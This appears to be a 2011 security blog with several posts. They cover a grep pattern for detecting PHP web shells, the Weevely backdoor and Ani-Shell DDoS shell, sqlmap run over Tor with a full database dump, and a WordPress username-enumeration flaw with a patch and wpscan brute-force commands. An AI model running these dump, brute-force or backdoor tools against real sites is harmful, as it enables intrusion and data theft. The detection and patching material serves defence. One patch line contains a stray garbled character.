Jun 11, 2011

My blog in mobile version

Now you can visit my blog in your mobile. Try it.


Metasploit Unleashed in PDF Format

That's right now you can download it to view on your labtop or tablet with offline.

The link is here.



Jun 10, 2011

Detection shell backdoor on Web Server

1. Web Shell Detection Using NeoPI - A python Script

2. PHP Shell Scanner - A perl Script

3. PHP script to find malicious code on a hacked server - A PHP Script

Btw for a quick one, the following grep command can also be used:

grep -RPl --include=*.{php,txt,asp} "(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile) *\(" /var/www/

Source: http://www.garage4hackers.com/showthread.php?987-Web-Backdoor-Shell-Detection-on-Servers

Jun 8, 2011

Weevely create and manage PHP trojan designed to be hardly detectable

This software is a proof of concept of an unobtrusive PHP backdoor that simulate a complete telnet-like connection, hidden datas in HTTP referers and using a dynamic probe of system-like functions to bypass PHP security restrictions.

Download last version available of Weevely 0.3

Source: https://code.google.com/p/weevely/

Ani-Shell: Mass Mailer, Web-Server Fuzzer, DDoser

Ani-Shell is a simple PHP shell with some unique features like Mass Mailer , A simple Web-Server Fuzzer , and a DDoser!

Features of Ani-Shell
  • Shell
  • Plateform Independent
  • Mass – Mailer
  • Small Web-Server Fuzzer
  • DDoser
  • Design

Source: http://www.pentestit.com/2011/06/08/anishell-mass-mailer-webserver-fuzzer-ddoser/

    Jun 7, 2011

    Howto: Use sqlmap via Tor on Backtrack5

    This test is just one of my lab not illegal or something like that.

    1. Edit the repository to the list
      - vim /etc/apt/sources.list

    2. Add tor's repository to the list
      - deb http://deb.torproject.org/torproject.org lucid main

    3. Add gpg key and add into the key list. 
      - gpg --keyserver keys.gnupg.net --recv 886DDD89
      - gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -

    4. Update the package list and Install tor packages.
      - apt-get update & apt-get install tor tor-geoipdb

    5. Get the config file of polipo from tor website and rename or remove the old config.
      - wget https://gitweb.torproject.org/torbrowser.git/blob_plain/HEAD:/build-scripts/config/polipo.conf
      - mv config config-bak
      - cp polipo.conf config

    6. Try to use sqlmap with "-tor" option.
      - cd /pentest/web/scanners/sqlmap
      - ./sqlmap.py -u "http://target.com/cart.php?id=1" --dump-all -tor

    PS. If you want to get the sqlmap with svn, try to use
      - svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap

    Jun 6, 2011

    Patching WordPress Username Disclosure

    On May 26th Veronica Valero of Talsoft S.R.L. posted a security advisory on the Full Disclosure mailing list outlining a username disclosure vulnerability via a Direct Object Reference.
    This is a problem in itself, however, what was more interesting to me was Zerial’s reply to the advisory;
    “Also you can “enumerate” wordpress users using the wp-login.php. When you enter a non-existent user wordpress returns “Invalid username” and when you enter a valid user with any random/dummie password, wordpress returns “Invalid Password”. Now you can use brute-force to enumerate all valid users using, for example, a name&username dictionary.”
    As we can see from a simple test on https://wordpress.org/wp-login.php, what he was saying was true.
    Existent user ‘admin’:

    Non-Existent user ‘nonexistant’:

    As we can see from the two screenshots above, there is a clear difference in the error message that is displayed by WordPress when a user exists or does not.
    According to OSVDB 55713 this vulnerability was reported to WordPress by Core Security Technologies in June 2009. At the time of writing, the latest version of WordPress is 3.1.3 and is still vulnerable to this vulnerability.
    Here is how to patch the vulnerability highlighted by ‘Zerial’ yourself:

    return new WP_Error(‘invalid_username’, sprintf(__(‘ERROR: Invalid username. Lost your password< /a>?’), site_url(‘wp-login.php?action=lostpassword’, ‘login’)));
    return new WP_Error( ‘invalid_username’, sprintf( __( ‘ERROR: Invalid username and/or password.’)));
    return new WP_Error( ‘incorrect_password’, sprintf( __( ‘ERROR: The password you entered for the username %฿31s is incorrect. Lost your password?’ )
    return new WP_Error( ‘incorrect_password’, sprintf( __( ‘ERROR: Invalid username and/or password.’)));
    Let’s hope WordPress patches this and the one Veronica disclosed sooner rather than later.
    After some further researching it seems a bug report was issued in 2007 on WordPress’s Trac. http://core.trac.wordpress.org/ticket/3708
    “There are other ways to verify user names. You can reverse engineer them from the author archive URLs (e.g. http://example.com/author/mark/). I believe the consensus last time this came up was that it was trivial to figure out the user names anyway, and that it is much http://www.blogger.com/post-edit.g?blogID=4148307234956956891&postID=8479941990261181049&from=pencilmore user-friendly to tell them when they messed up their username, and not the password. Also, “admin” is created on install, and can’t be changed using WordPress itself, so there’s no hiding that.”

    Update#2  Now I found the blog that create script for this flaw. You can visit his blog to download and try it. But please use in legal. 

    Update#3 The new script for this flaw was released by Ryan Dewhurst. Try this
    1. sudo apt-get install libcurl14-gnutls-dev
    2. sudo gem install typhoeus
    3. sudo gem install xml-simple
    4. svn checkout http://wpscan.googlecode.com/svn/trunk/ wpscan-read-only

    Example usage:
    ruby wpscan.rb –url www.example.com
    ruby wpscan.rb –url www.example.com –wordlist darkc0de.lst –threads 50
    ruby wpscan.rb –url www.example.com –wordlist darkc0de.lst –username admin
    Source: http://seclists.org/webappsec/2011/q2/48
    Source:  https://www.infosecisland.com/blogview/14196-Patching-WordPress-Username-Disclosure.html